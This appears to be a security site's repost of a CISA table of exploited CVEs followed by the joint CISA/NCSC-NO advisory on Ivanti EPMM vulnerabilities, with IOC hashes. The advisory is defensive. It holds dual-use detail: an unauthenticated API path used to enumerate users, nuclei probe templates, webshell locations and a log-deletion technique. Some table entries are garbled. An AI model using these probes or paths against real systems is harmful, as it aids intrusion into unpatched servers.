CVE-2021-26855	Microsoft	Exchange Server, Multiple Versions	Microsoft Exchange Server Remote Code Execution Vulnerability, CVE-2021-26855	CISA Alert: Mitigate Microsoft Exchange Server Vulnerabilities
CVE-2021-26857	Microsoft	Exchange Server, Multiple Versions	Microsoft Exchange Server Remote Code Execution Vulnerability, CVE-2021-26857	CISA Alert: Mitigate Microsoft Exchange Server Vulnerabilities
CVE-2021-26858	Microsoft	Exchange Server, Multiple Versions	Microsoft Exchange Server Remote Code Execution Vulnerability, CVE-2021-26858	CISA Alert: Mitigate Microsoft Exchange Server Vulnerabilities
CVE-2021-27065	Microsoft	Multiple Products	Microsoft Exchange Server Remote Code Execution Vulnerability, CVE-2021-27065	CISA Alert: Mitigate Microsoft Exchange Server Vulnerabilities
CVE-2021-20021	SonicWALL	Email Security version 10.0.9.x Email Security	SonicWall Email Security pre-authentication administrative account creation vulnerability
CVE-2021-31207	Microsoft	Exchange Server, Multiple Versions	Microsoft Exchange Server Security Feature Bypass Vulnerability, CVE-2021-31207	CISA Alert: Urgent: Protect Against Active Exploitation of ProxyShell Vulnerabilities ACSC Alert: Microsoft Exchange ProxyShell Targeting in Australia
CVE-2022-26134	Atlassian	Confluence Server and Data Center, versions: 7.4.17, 7.13.7, 7.14.3, 7.15.2, 7.16.4, 7.17.4, 7.18.1	Confluence Security Advisory 2022-06-02	CISA Alert: CISA Adds One Known Exploited Vulnerability (CVE-2022-26134) to Catalog ACSC Alert: Remote code execution vulnerability present in Atlassian Confluence Server and Data Center
CVE-2021-34473	Microsoft	Exchange Server, Multiple Version	Microsoft Exchange Server Remote Code Execution Vulnerability, CVE-2021-34473	Joint CSA: Iranian Government-Sponsored APT Cyber Actors Exploiting Microsoft Exchange and Fortinet Vulnerabilities in Furtherance of Malicious Activities
CVE-2021-34523	Microsoft	Microsoft Exchange Server 2013 Cumulative Update 23 Microsoft Exchange Server 2016 Cumulative Updates 19 and 20 Microsoft Exchange Server 2019 Cumulative Updates 8 and 9	Microsoft Exchange Server Elevation of Privilege Vulnerability, CVE-2021-34523	CISA Alert: Urgent: Protect Against Active Exploitation of ProxyShell Vulnerabilities
CVE-2021-26084	Jira Atlassian	Confluence Server and Data Center, versions 6.13.23, from version 6.14.0 before 7.4.11, from version 7.5.0 before 7.11.6, and from version 7.12.0 before 7.12.5.	Jira Atlassian: Confluence Server Webwork OGNL injection – CVE-2021-26084	CISA Alert: Atlassian Releases Security Updates for Confluence Server and Data Center
CVE-2021-40539	Zoho ManageEngineCorp.	ManageEngine ADSelfService Plus builds up to 6113	Security advisory – ADSelfService Plus authentication bypass vulnerability	ACSC Alert: Critical vulnerability in ManageEngine ADSelfService Plus exploited by cyber actors
CVE-2021-40438	Apache	HTTP Server 2.4.48
CVE-2021-41773	Apache	Apache HTTP Server 2.4.49	Apache HTTP Server 2.4 vulnerabilities
CVE-2021-42013	Apache	Apache HTTP Server 2.4.50	Apache HTTP Server 2.4 vulnerabilities
CVE-2021-20038	SonicWall	SMA 100 Series (SMA 200, 210, 400, 410, 500v), versions 10.2.0.8-37sv, 10.2.1.1-19sv, 10.2.1.2-24svSMA 100 series appliances	SonicWall patches multiple SMA100 affected vulnerabilities	ACSC Alert: Remote code execution vulnerability present in SonicWall SMA 100 series appliances CCCS Alert: SonicWall Security Advisory
CVE-2021- 44228	Apache	Log4j, all versions from 2.0-beta9 to 2.14.1 For other affected vendors and products, see CISA’s GitHub repository.	Apache Log4j Security Vulnerabilities For additional information, see joint CSA: Mitigating Log4Shell and Other Log4j-Related Vulnerabilities	CISA webpage: Apache Log4j Vulnerability Guidance CCCS Alert: Active exploitation of Apache Log4j vulnerability – Update 7 ACSC Advisory: 2021-007: Log4j vulnerability – advice and mitigations ACSC Publication: Log4j: What Boards and Directors Need to Know
CVE-2021-45046	Apache	Log4j 2.15.0Log4j	Apache Log4j Security Vulnerabilities
CVE-2022-42475	Fortinet	FortiOS SSL-VPN 7.2.0 through 7.2.2, 7.0.0 through 7.0.8, 6.4.0 through 6.4.10, 6.2.0 through 6.2.11, 6.0.15 and earlier and FortiProxy SSL-VPN 7.2.0 through 7.2.1, 7.0.7 and earlier	FortiOS – heap-based buffer overflow in sslvpnd
CVE-2022-24682	Zimbra	Zimbra Collaboration Suite 8.8.x before 8.8.15 patch 30 (update 1) Collaboration Suite	Zimbra Collaboration Joule 8.8.15 Patch 30 GA Release
CVE-2022-22536	SAP	NetWeaver Application Server ABAP, SAP NetWeaver Application Server Java, ABAP Platform, SAP Content Server 7.53, and SAP Web Dispatcher Internet Communication Manager (ICM)	Remediation of CVE-2022-22536 Request smuggling and request concatenation in SAP NetWeaver, SAP Content Server and SAP Web Dispatcher	CISA Alert: Critical Vulnerabilities Affecting SAP Applications Employing Internet Communication Manager (ICM)
CVE-2022-22963	VMware Tanzumware Tanzu	Spring Cloud Function versions 3.1.6, 3.2.2, and older unsupported versions	CVE-2022-22963: Remote code execution in Spring Cloud Function by malicious Spring Expression
CVE-2022-22954	VMware	Workspace ONE Access, versions 21.08.0.1, 21.08.0.0, 20.10.0.1, 20.10.0.0 Identity Manager (vIDM) 3.3.6, 3.3.5, 3.3.4, 3.3.3 vRealize Automation (vIDM), 8.x, 7.6 VMware Cloud Foundation (vIDM), 4.x vRealize Suite Lifecycle Manager (vIDM), 8.xWorkspace ONE Access and Identity Manager	VMware Advisory VMSA-2022-0011
CVE-2022-22960	VMware	Workspace ONE Access, versions 21.08.0.1, 21.08.0.0, 20.10.0.1, 20.10.0.0 Identity Manager (vIDM) and vRealize Automation3.3.6, 3.3.5, 3.3.4, 3.3.3 vRealize Automation (vIDM), 8.x, 7.6 VMware Cloud Foundation (vIDM), 4.x VMware Cloud Foundation (vRA), 3.x vRealize Suite Lifecycle Manager (vIDM), 8.x	VMSA-2022-0011
CVE-2022-29464	AtlassianWSO2	WSO2 API Manager 2.2.0 and above through 4.0.0 WSO2 Identity Server 5.2.0 and above through 5.11.0 WSO2 Identity Server Analytics 5.4.0, 5.4.1, 5.5.0, and 5.6.0 WSO2 Identity Server as Key Manager 5.3.0 and above through 5.10.0 WSO2 Enterprise Integrator 6.2.0 and above through 6.6.0	WSO2 Documentation – Spaces
CVE-2022-27924	Zimbra	Zimbra Collaboration Suite, 8.8.15 and 9.0	Zimbra Collaboration Kepler 9.0.0 Patch 24.1 GA Release
CVE-2022-1388	F5 Networks	F5 BIG-IP 16.1.x versions prior to 16.1.2.2, 15.1.x versions prior to 15.1.5.1, 14.1.x versions prior to 14.1.4.6, 13.1.x versions prior to 13.1.5, and All 12.1.x and 11.6.x versions	K23605346: BIG-IP iControl REST vulnerability CVE-2022-1388	Joint CSA: Threat Actors Exploiting F5 BIG-IP CVE-2022-1388
CVE-2022-30190	Microsoft	Exchange Server, Multiple Versions		CISA Alert: Microsoft Releases Workaround Guidance for MSDT “Follina” Vulnerability
CVE-2022-22047	Microsoft	Multiple Products	Windows Client Server Run-time Subsystem (CSRSS) Elevation of Privilege Vulnerability, CVE-2022-22047
CVE-2022-27593	QNAP	Certain QNAP NAS running Photo Station with internet exposure Ausustor Network Attached Storage	DeadBolt Ransomware
CVE-2022-41082	Microsoft	Exchange Server 2016 Cumulative Update 23, 2019 Cumulative Update 12, 2019 Cumulative Update 11, 2016 Cumulative Update 22, and 2013 Cumulative Update 23	Microsoft Exchange Server Remote Code Execution Vulnerability, CVE-2022-41082	ACSC Alert: Vulnerability Alert – 2 new Vulnerabilities associated with Microsoft Exchange.
CVE-2022-40684	Fortinet	FortiOS version 7.2.0 through 7.2.1 and 7.0.0 through 7.0.6, FortiProxy version 7.2.0 and version 7.0.0 through 7.0.6 and FortiSwitchManager version 7.2.0 and 7.0.0	FortiOS / FortiProxy / FortiSwitchManager – Authentication bypass on administrative interface

Source de l’article sur us-cert.gov

2 August 2023/by Service comm.

Threat Actors Exploiting Ivanti EPMM Vulnerabilities

Sécurité de l'information et du SI, Sécurité de l’information, Sécurité du système d’information

SUMMARY

The Cybersecurity and Infrastructure Security Agency (CISA) and the Norwegian National Cyber Security Centre (NCSC-NO) are releasing this joint Cybersecurity Advisory (CSA) in response to active exploitation of CVE-2023-35078 and CVE-2023-35081. Advanced persistent threat (APT) actors exploited CVE-2023-35078 as a zero day from at least April 2023 through July 2023 to gather information from several Norwegian organizations, as well as to gain access to and compromise a Norwegian government agency’s network.

Ivanti released a patch for CVE-2023-35078 on July 23, 2023. Ivanti later determined actors could use CVE-2023-35078 in conjunction with another vulnerability CVE-2023-35081 and released a patch for the second vulnerability on July 28, 2023. NCSC-NO observed possible vulnerability chaining of CVE-2023-35081 and CVE-2023-35078.

CVE-2023-35078 is a critical vulnerability affecting Ivanti Endpoint Manager Mobile (EPMM) (formerly known as MobileIron Core). The vulnerability allows threat actors to access personally identifiable information (PII) and gain the ability to make configuration changes on compromised systems. CVE-2023-35081 enables actors with EPMM administrator privileges to write arbitrary files with the operating system privileges of the EPMM web application server. Threat actors can chain these vulnerabilities to gain initial, privileged access to EPMM systems and execute uploaded files, such as webshells.

Mobile device management (MDM) systems are attractive targets for threat actors because they provide elevated access to thousands of mobile devices, and APT actors have exploited a previous MobileIron vulnerability. Consequently, CISA and NCSC-NO are concerned about the potential for widespread exploitation in government and private sector networks.

This CSA provides indicators of compromise (IOCs) and tactics, techniques, and procedures (TTPs) obtained by NCSC-NO investigations. The CSA also includes a nuclei template to identify unpatched devices and detection guidance organizations can use to hunt for compromise. CISA and NCSC-NO encourage organizations to hunt for malicious activity using the detection guidance in this CSA. If potential compromise is detected, organizations should apply the incident response recommendations included in this CSA. If no compromise is detected, organizations should still immediately apply patches released by Ivanti.

Download the PDF version of this report:

AA23-213A PDF (PDF, 492.43 KB )

Download the .xml or .json file associated with this report:

AA23-213A STIX XML (XML, 277.43 KB )

AA23-213A STIX JSON (JSON, 250.01 KB )

TECHNICAL DETAILS

Note: This advisory uses the MITRE ATT&CK^® for Enterprise framework, version 13. See the MITRE ATT&CK Tactics and Techniques section of this advisory for a table of the threat actors’ activity mapped to MITRE ATT&CK® tactics and techniques. For assistance with mapping malicious cyber activity to the MITRE ATT&CK framework, see CISA and MITRE ATT&CK’s Best Practices for MITRE ATT&CK Mapping and CISA’s Decider Tool.

Overview

In July 2023, NCSC-NO became aware of APT actors exploiting a zero-day vulnerability in Ivanti Endpoint Manager (EPMM), formerly known as MobileIron Core, to target a Norwegian government network. Ivanti confirmed that the threat actors exploited CVE-2023-35078 and released a patch on July 23, 2023.[1] Ivanti later determined actors could use CVE-2023-35078 in conjunction with another vulnerability, CVE-2023-35081, and released a patch for the second vulnerability on July 28, 2023.[2]

CVE-2023-35078 is a critical authentication bypass [CWE-288] vulnerability affecting Ivanti Endpoint Manager Mobile (EPMM), formerly known as MobileIron Core. The vulnerability allows unauthenticated access to specific application programming interface (API) paths. Threat actors with access to these API paths can access PII such as names, phone numbers, and other mobile device details of users on the vulnerable system; make configuration changes to vulnerable systems; push new packages to mobile endpoints; and access Global Positioning System (GPS) data if enabled.

According to Ivanti, CVE-2023-35078 can be chained with a second vulnerability CVE-2023-35081.[2] CVE-2023-35081 is directory traversal vulnerability [CWE-22] in EPMM. This vulnerability allows threat actors with EPMM administrator privileges the capability to write arbitrary files, such as webshells, with operating system privileges of the EPMM web application server. The actors can then execute the uploaded file.[2]

CISA added CVE-2023-35078 to its Known Exploited Vulnerabilities Catalog on July 25, 2023, and CVE-2023-35081 on July 31, 2023.

CISA and NCSC-NO are concerned about the potential for widespread exploitation of both vulnerabilities in government and private sector networks because MDM systems provide elevated access to thousands of mobile devices. Threat actors, including APT actors, have previously exploited a MobileIron vulnerability [3],[4].

APT Actor Activity

The APT actors have exploited CVE-2023-35078 since at least April 2023. The actors leveraged compromised small office/home office (SOHO) routers, including ASUS routers, to proxy [T1090] to target infrastructure, and NCSC-NO observed the actors exploiting CVE-2023-35078 to obtain initial access to EPMM devices [T1190] and:

Perform arbitrary Lightweight Directory Access Protocol (LDAP) queries against the Active Directory (AD).
Retrieve LDAP endpoints [T1018].
Use API path /mifs/aad/api/v2/authorized/users to list users and administrators [T1087.002] on the EPMM device.
Make EPMM configuration changes (Note: It is unknown what configuration changes the actors made).
Regularly check EPMM Core audit logs [T1005].

The APT actors deleted some of their entries in Apache httpd logs [T1070] using mi.war, a malicious Tomcat application that deletes log entries based on the string in keywords.txt. The actors deleted log entries with the string Firefox/107.0.

The APT actors used Linux and Windows user agents with Firefox/107.0 to communicate with EPMM. Other agents were used; however, these user agents did not appear in the device logs. It is unconfirmed how the threat actors ran shell commands on the EPMM device; however, NCSC-NO suspects the actors exploited CVE-2023-35081 to upload webshells on the EPMM device and run commands [T1059].

The APT actors tunneled traffic [T1572] from the internet through Ivanti Sentry, an application gateway appliance that supports EPMM, to at least one Exchange server that was not accessible from the internet [T1090.001]. It is unknown how they tunneled traffic. NCSC-NO observed that the network traffic used the TLS certificate of the internal Exchange server. The APT actors likely installed webshells [T1505.003] on the Exchange server in the following paths [T1036.005]:

/owa/auth/logon.aspx
/owa/auth/logoff.aspx
/owa/auth/OutlookCN.aspx

NCSC-NO also observed mi.war on Ivanti Sentry but do not know how the actors placed it there.

MITRE ATT&CK TACTICS AND TECHNIQUES

See Table 1—Table 7 for all referenced threat actor tactics and techniques in this advisory.

Table 1: APT Actors ATT&CK Techniques for Initial Access

Technique Title	ID	Use
Exploit Public-Facing Application	T1190	The APT actors exploited CVE-2023-35078 in public facing Ivanti EPMM appliances since at least April 2023.

Table 2: APT Actors ATT&CK Techniques for Execution

Technique Title	ID	Use
Command and Scripting Interpreter	T1059	The APT actors may have exploited CVE-2023-35081 to upload webshells on the EPMM device and run commands.

Table 3: APT Actors ATT&CK Techniques for Discovery

Technique Title	ID	Use
Account Discovery: Domain Account	T1087.002	The APT actors exploited CVE-2023-35078 to gather EPMM device users and administrators.
Remote System Discovery	T1018	The APT actors retrieved LDAP endpoints.

Table 4: APT Actors ATT&CK Techniques for Persistence

Technique Title	ID	Use
Masquerading: Match Legitimate Name or Location	T1036.005	The APT actors likely installed webshells at legitimate Exchange server paths.
Server Software Component: Web Shell	T1505.003	The APT actors implanted webshells on the compromised infrastructure.

Table 5: APT Actor ATT&CK Techniques for Defense Evasion

Technique Title	ID	Use
Indicator Removal	T1070	APT actors deleted httpd access logs after the malicious activities took place using string `Firefox/107.0`.

Table 6: APT Actor ATT&CK Techniques for Collection

Technique Title	ID	Use
Data from Local System	T1005	APT actors regularly checked EPMM Core audit logs.

Table 7: APT Actor ATT&CK Techniques for Command and Control

Technique Title	ID	Use
Protocol Tunneling	T1572	The APT actors tunneled traffic from the internet to an Exchange server that was not accessible from the internet.
Proxy	T1090	The actors leveraged compromised SOHO routers to proxy to and compromise infrastructure. The actors tunneled traffic from the internet to at least one Exchange server.
Proxy: Internal Proxy	T1090.001	The APT actors tunneled traffic from the internet to an Exchange server that was not accessible from the internet.

Technique Title

Use

Protocol Tunneling

T1572

The APT actors tunneled traffic from the internet to an Exchange server that was not accessible from the internet.

Proxy

T1090

The actors leveraged compromised SOHO routers to proxy to and compromise infrastructure.

The actors tunneled traffic from the internet to at least one Exchange server.

Proxy: Internal Proxy

T1090.001

The APT actors tunneled traffic from the internet to an Exchange server that was not accessible from the internet.

EVIDENCE OF VULNERABILITY METHODS

CISA recommends administrators use the following CISA-developed nuclei template to determine vulnerability to CVE-2023-30578:

id: CVE-2023-35078-Exposure

info:

name: Ivanti EPMM Remote Unauthenticated API Access

author: JC

severity: critical

reference:

- https://nvd.nist.gov/vuln/detail/CVE-2023-35078

description: Identifies vulnerable instances of Ivanti Endpoint Manager Mobile (EPMM), formerly MobileIron Core, through 11.10 allows remote attackers to obtain PII, add an administrative account, and change the configuration because of an authentication bypass.

tags: ivanti, mobileiron, epmm, auth-bypass

requests:

- method: GET

path:

- "{{RootURL}}/mifs/aad/api/v2/ping"

matchers-condition: and

matchers:

- type: status

status:

- 200

- type: word

part: body

words:

- "vspVersion"

- "apiVersion"

condition: and

CISA recommends administrators use the following CISA-developed nuclei template to determine vulnerability to CVE-2023-35081:

id: CVE-2023-35081

info:

name: Ivanti EPMM Remote Arbitrary File Write

author: JC

severity: High

reference:

- https://nvd.nist.gov/vuln/detail/CVE-2023-35081

description: Identifies vulnerable unpatched versions of Ivanti Endpoint Manager Mobile (EPMM), formerly MobileIron Core, through 11.10.0.3, 11.9.1.2, and 11.8.1.2 that allows an authenticated administrator to perform arbitrary file writes to the EPMM server.

tags: ivanti, mobileiron, epmm

requests:

- method: GET

path:

- "{{RootURL}}/mifs/c/windows/api/v2/device/registration"

matchers-condition: and

matchers:

- type: status

status:

- 200

- type: regex

part: all

regex:

- '.*?VSP ((0?[0-9]|10)(.d+){1,3}|11.(0?[0-7])(.d+){1,2}|11.8.0(.d+)?|11.8.1.[0-1]|11.9.0(.d+)?|11.9.1.[0-1]|11.10.0.[0-2]).*'

Run the following NCSC-NO-created checks to check for signs of compromise:

Investigate logs in centralized logging solutions or forwarded syslogs from EPMM devices for any occurrences of /mifs/aad/api/v2/.
Look for spikes or an increase of EventCode=1644 in the AD since at least April 2023. The LDAP queries performed by EPMM when the threat actor used the MIFS API generated tens of millions of this event code. Also look for EventCodes 4662, 5136, and 1153.
To detect tunneling activity through Sentry, look for traffic from EPMM devices to other internal servers, as well as TLS traffic towards instances of EPMM with different TLS certificates than the instance itself would possess. Traffic to EPMM with certificates originating from endpoints further inside the network, e.g. standard Windows generated certificates such as CN=EXCHANGE01 or similar.
Perform forensic analysis of disk and memory since log retention may be poor and threat actors have been observed deleting log entries. Pay particular attention to unallocated disk space (free space on filesystem).
Check for activity from ASUS routers in your own country towards EPMM and Sentry devices.

INCIDENT RESPONSE

If compromise is detected, organizations should:

Quarantine or take offline potentially affected hosts.
Reimage compromised hosts.
Provision new account credentials.
Collect and review artifacts such as running processes/services, unusual authentications, and recent network connections.
Report the compromise to CISA via CISA’s 24/7 Operations Center (report@cisa.gov or 888-282-0870) or to NCSC-NO via NCSC-NO’s 24/7 Operations Center (cert@ncsc.no or +47 23 31 07 50).

MITIGATIONS

CISA and NCSC-NO recommend organizations:

Upgrade Ivanti EPMM versions to the latest version as soon as possible. See Ivanti CVE-2023-35081 – Remote Arbitrary File Write for patch information. This patch protects against CVE-2023-35078 and CVE-2023-35081.
- See the Evidence of Vulnerability Methods section of this advisory for CISA-developed nuclei templates to find any EPMM versions vulnerable to CVE-2023-35078 and CVE-2023-35081.
- Organizations using unsupported versions (i.e., versions prior to 11.8.1.0) should immediately upgrade to a supported version. If you cannot immediately upgrade, apply the Ivanti-provided RPM fix for CVE-35078 (this workaround does not protect against CVE-2023-35081):
  - Login to command line shell (CLI) in enable mode.
  - Run the following command: # install rpm url https://support.mobileiron.com/ivanti-updates/ivanti-security-update-1.0.0-1.noarch.rp
  - See Ivanti’s Knowledge Base (KB) Remote unauthenticated API access vulnerability – CVE-2023-35078 for more information on the RPM fix.
Treat MDM systems as high-value assets (HVAs) with additional restrictions and monitoring. MDM systems provide elevated access to thousands of hosts and should be treated as high value assets (HVAs) with additional restrictions and monitoring.
Follow best cybersecurity practices in production and enterprise environments, including mandating phishing-resistant multifactor authentication (MFA) for all staff and services. For additional best practices, see CISA’s Cross-Sector Cybersecurity Performance Goals (CPGs). The CPGs, developed by CISA and the National Institute of Standards and Technology (NIST), are a prioritized subset of IT and OT security practices that can meaningfully reduce the likelihood and impact of known cyber risks and common TTPs. Because the CPGs are a subset of best practices, CISA and NCSC-NO also recommend software manufacturers implement a comprehensive information security program based on a recognized framework, such as the NIST Cybersecurity Framework (CSF).

VALIDATE SECURITY CONTROLS

In addition to applying mitigations, CISA and NCSC-NO recommends exercising, testing, and validating your organization’s security program against the threat behaviors mapped to the MITRE ATT&CK for Enterprise framework in this advisory. CISA recommends testing your existing security controls inventory to assess how they perform against the ATT&CK techniques described in this advisory.

To get started:

Select an ATT&CK technique described in this advisory (see Table 1–Table 7).
Align your security technologies against the technique.
Test your technologies against the technique.
Analyze your detection and prevention technologies’ performance.
Repeat the process for all security technologies to obtain a set of comprehensive performance data.
Tune your security program, including people, processes, and technologies, based on the data generated by this process.

CISA recommends continually testing your security program, at scale, in a production environment to ensure optimal performance against the MITRE ATT&CK techniques identified in this advisory.

REFERENCES

[1] Ivanti: CVE-2023-35078 – Remote Unauthenticated API Access Vulnerability

[2] Ivanti: CVE-2023-35081 – Remote Arbitrary File Write

[3] CISA: Potential for China Cyber Response to Heightened U.S.-China Tensions

[4] CISA: Top Routinely Exploited Vulnerabilities

RESOURCES

ACKNOWLEDGEMENTS

Ivanti contributed to this joint advisory.

NCSC-NO wishes to acknowledge Mnemonic’s contributions.

VERSION HISTORY

August 1, 2023: Initial version.

August 2, 2023: Added stix file, updated Acknowledgements section, and added Resources section.

APPENDIX: INDICATORS OF COMPROMISE

NCSC-NO observed the following webshell hash:

c0b42bbd06d6e25dfe8faebd735944714b421388

NCSC-NO observed the following hash of mi.war:

1cd358d28b626b7a23b9fd4944e29077c265db46

NCSC-NO observed the following JA3 hashes used against MobileIron Core:

2d5bd942ebf308df61e1572861d146f6

473cd7cb9faa642487833865d516e578

579ccef312d18482fc42e2b822ca2430

849d3331f3e07a0797a02f12a6a82aa9

8d9f7747675e24454cd9b7ed35c58707

ad55557b7cbd735c2627f7ebb3b3d493

cd08e31494f9531f560d64c695473da9

e1d8b04eeb8ef3954ec4f49267a783ef

e60dc8370ecf78cf115162fbc257baf5

e669667efb41c36f714c309243f41ca7

e84a32d43db750b206cb6beed08281d0

eb5fdc72f0a76657dc6ea233190c4e1c

NCSC-NO observed the following JA3 hashes used against Exchange when tunneling via EPMM Sentry:

0092ce298a1d451fbe93dc4237053a96

00e872019b976e69a874ee7433038754

01ecd9ab9be75e832c83c082be3bdf18

0212a88c7ed149febdefa347c610b248

02be3b93640437dbba47cc7ed5ab7895

03f8852448a85e14f2b4362194160c32

045f8ccdac6d4e769b30da406808da71

04e7f5787f89a597001b50a37b9f8078

070f9fe9f0ec69e6b8791d280fde6a48

07a624d7236cca3934cf1f8e44b74b52

09df72c01a1a0ad193e2fff8e454c9c4

0b28842d64a344c287e6165647f3b3fe

0b8e1211de50d244b89e6c1b366d3ccf

0cb0380cf75a863b3e40a0955b1ada9f

0da24834056873a8cd8311000088e8be

0e1fad8ffaa7a939f0a6cbf9cd7e2fcd

0f6e78839398c245d13f696a3216d840

119f8c9050d1499b6f958b857868b8ce

11c506d5e3fb7e119c4287202c96a930

1336df27f94b25a25acac9db3e61e461

14671c3f8deca7d73a03b74cb854c21d

146caf9bd0153428f54e9ef472154983

14994353f3ea6fd25952a8c7d57f9ecf

151bc875df15d1385e6eb02f9edaba06

15a074a397727b26a846b443b99c20ff

1660f3d882a4311ca013ee4586e01fd9

16a74fc216f8a4ce43466bb83b6d3fd2

188623fdd056c4ed13d1ff34c7377637

19f51486abd40c9f0fc0503559a6c523

1a024e63721c610d2e54e67d62cd5460

1aa7dae8f2ae0a29402ed51819f82db4

1abfdeaadb74a0f7c461e7bab157b17f

1b6720ed0b67c910a80722ce973d6217

1b7d9368c6ce7623fdbc43f013626535

1e0850e10a00c9bbdd5c582ff4cb6833

1ec71612e438cf902913eec993475eb9

206fed3a39d9215c35395663f5bb3307

22cc1b3bc9f99d3a520ae58fee79a0d5

23e3e6fa8b23d9bc19e82de4e64c79e9

253fd4659bf21be116858bc0f206c5b9

276e175d4fe8454c4c47e966d8cb3fa3

289a450c7478dd52a10c6ed2fb47f7e9

2aa8ba7478b1362274666d714df575bc

2beecb6b9e386f29d568229a9953c3d2

2ebc7fdceaa9a0df556e989d77157006

3003024afe64b4e8a5a30825c14bbb12

3082e669dda9d023e2dcd8b9549a84a8

309d33c6f77a3fc75654c44c61596ccd

30a9f568eb3df79352fc587a078623b6

30be84e6b95f44c203f8e7fce7339a8e

3268a5097a543c7dbd82c39a9193b7fe

32775ead3ea1ad7db2f4bea67fe0cabb

34ac9a6ef5d285119abec50fbe41fcfe

34d92552e278710c1e84f0bd8dc3a6b8

361f47a6357cc6e3a9bcdd20cfaaf0e9

3685abc75517e61e47e52e5f2d060f54

3744004013135b9f9a05cb58cda8134d

37d952966ea7e79277803f13d7147544

391a4c2c7541b8b78e2f99bf586e9794

393662e5aa0cb49c5d666a6d10a1ade6

3962b622c5aa815afb803b92aa948424

3b22af324abded2781ed8f6a61f3654f

3b30b4555cc8b4b164ad03cf322cbea8

3bd1bdb5e90b9590a8878bff2ada8204

3be529eb3a7daaf34f963a22188f6139

3dd13faad1c45eb0c23e4567210f7eac

403273b51f91cf3c333695e5532cb2c3

404f56045e436d53ead2177bf957ba39

41854adbc73b0b58e5c566f60bb0df25

43c22dabb1e6d2449a39c2f7e974d537

476e72bbda5b78d188766139889e3038

4898a51256ae7d914a5ffd5695973470

49230c486f0fd383cd301fe162d6a786

4959a611b9885022d81b4bc8e4b1d149

495c6ff7ca0379ad0891bac47917d09a

49d2bd08038dc7dada221008591940f9

4c1b73ec52e6eec0c5d20577fcbc9ef1

4d34db639ba84b11822fb3dac47ed7d1

5244b163f9326a1e5eaa8860f7543f99

539f1a5183800a96228458932f9307f7

5466368d4659f1b1470bcb09e65b484d

549cde6535a884126755fc53f59a820c

555389e92c622b87d3fc395fd8723501

588d0b42e54174a98e1eca59945e8b32

58bc21d305a65c41745327f142f3ac12

59401c9a60449c742d073d93d1b7039a

59eec218522cc5c7743a0d37892a3345

59faf75430e9326d3ae9d231bb3ae8c6

5d0259ca16cfc2d7d1b0fac69f29ab05

5d55026fb84dba91ac01e2095504b1bc

5e35f50c692081fd6c7ddac1272e2d6c

5f4d5965af741bba59b7c8d3425f33dd

6010282004917ecf3900babf61456432

6088c2a04c94cdcd5a283a6d1622ffba

61dee38d2f97220efb1218ad8971e3ab

62ac194f2526eb45485526bca35c8f43

634296a023280d020674c873d0199760

635755dadfab8b92fb502aafb09122db

63fc58be0d7b48eaa34da7f752ae8ae6

6441640409815cfb4bf469e685e1bdb5

646973d1928c401ba80961c12cbf84a2

65eef0a0ee257254ef0418aa57192cfb

66f6a192083a7ab00ae8e0b5cc52e8f4

67a42e2e27ffc26d1f3d0ceb8384afd0

689385f1218e0d4c347595648ca6a776

692f91c0c5e9e93e0a24bd3392887ca1

69ecf52960c8bd9e746dfe9ee19c11f6

6e359f3bbc622e9b1ed36f6e3d521bcf

6e3650528f719fc50988a1f697644832

6ead0d5d3f87911c27f3ae0a75e6b5bc

6f1fa8b444caf0d8238f948279ca74e1

6fb8cdf567dd7d89d53b5771d769cb5f

706b6055658aff067ae370f23831ef6b

708140c311d3d69418f75c928e7535a0

719ec5da8f2153a436ee8567ff609894

7292ef4cdca529071fad97496e1c9439

74871691eac48156ce0da2cfa3ab401a

74cf24f2a66a31c88b6fcfe01f12160c

75e874d8e0a79697633b87ea5e798b1c

76c0d09fed2f33babb0de8ee2c07144c

77a01363fa2b29af25c004da9570e23c

78988c65e9b70e7929e747408d8f0b0e

79c6d12d168b85437384b20eb94e106b

7b4137b4e85f31a81bb5bafeda993947

7b9db1d58326c1fa276ba2a39bcc2617

7cbc7459db5327c26476549f225030f5

7cd727171c2522f51417edeeba4f1791

7e3630c67c802eabb67b108ad4d7ded7

802f5d34c230da40c0912a1c5a9b702b

80bd0f3610f6c4d60584a5be0b8a3016

819030799f0020ed724c2ef3ffaa56c6

8207129585da68066ed08e94216d76ee

821f649d08687e22f96cea99fbb5d3a3

830838cb0620d659405a74401cd72557

833d3201066f5184c874c73a2083c448

840f488b7c0a5d686d1e89908735f354

84301b967a4d9a242466c04901bad691

85c3fac6a9885362c448f434671e362f

883b9fe16e45c388968defc73a5fba7a

8a6b0ba3496eeca39d6d3f9bae830c90

8ad0fd4b78c89bd63b97343fda1eeccb

8b0ae9029974091df12210255aaecad6

8b297f8b219e968932293ee7a8242ca3

8bb1781e756a53cd00d9b2ec670fa21e

8d5515351afdf27b013f96a05bf45147

8fafa73e9985e05d0c1c964da770c567

905967b08bd44cfa60d969229921ac23

9188ef45ea917a91ec9b92b5dd8cd90d

918dfab0333ae15d61f14fd24b5eaaac

922a3272aad17c9eaad733696a4321da

9253399537fad8448f1d4732dd79f6fa

934a8a6528e91caa019acb76e791a71d

95588e0386206fa02912cfcaf18c1220

9610328cdaa4694800c2c93410f8ce82

9622902cc43f4a20d0d686a37e4d8232

96c41e4c4a1812187fb279b9299ad63b

984c4653a563b19c87f264611a6adc01

9980febfaf901d4113a1c473f79d7eb6

9a176d818edff838fc057cea3ee372c0

9ba21c5148913186a5bf877078cbc048

9cfda02ef7e04c469b77f8197a249c17

9d74d395bd2f72a47a5c980e6040df5a

9df128ebe0c82064aa746647883112c9

9e5613533972a9d42d2e3344a4e58566

9ec17429eed5446e3720796ab50d8c60

9f2438aaab4744c4b7b5b7287a783099

9f3bf94572344b36f6ef1689cb30c66e

9fdd7a85b3a4ef8ded73beb3e6218109

a1b732a9af792f75a68ed78d72ffb8f6

a260d836428cdb971bdf147ca6940160

a4f11b1eb659869a0ae70898a4a0e5ee

a596ebbcf438980c880d711315e4fdf1

a80b6a354b493264f37aa39d0d41b5fc

a89df6156eb5a2de196388d4a123b470

a96837fe533247abb7f88000d0216a50

a98cf0a359f430a00f4f3d522f5b6cc0

aa2fe3a253e169b05e1782ca57a688d2

aef0172a2c03f77912de0bbf14aee00f

af06c3e72f2f307515ba549174d8e5a6

b311ab82b30f41b12cb9089d00c4a1ff

b4f31423445b5f13675f205ac997f41f

b50666c9aed1c2f222c56b6e9b326d27

b53f179b3f25f72bb0c7ccf45bf8beee

b57f3e41c03803306b0ee2111f7ef823

b79434613820faf30d58f103c4415a29

b8366aaa5ed51c0dea3fc90ef7e14889

b8f6b0d234a305c25411e83fd430c624

b956ed2b848dabb4e79ab7358233861b

b9ecb08402df0f1f6e1ce76b8ad6e91f

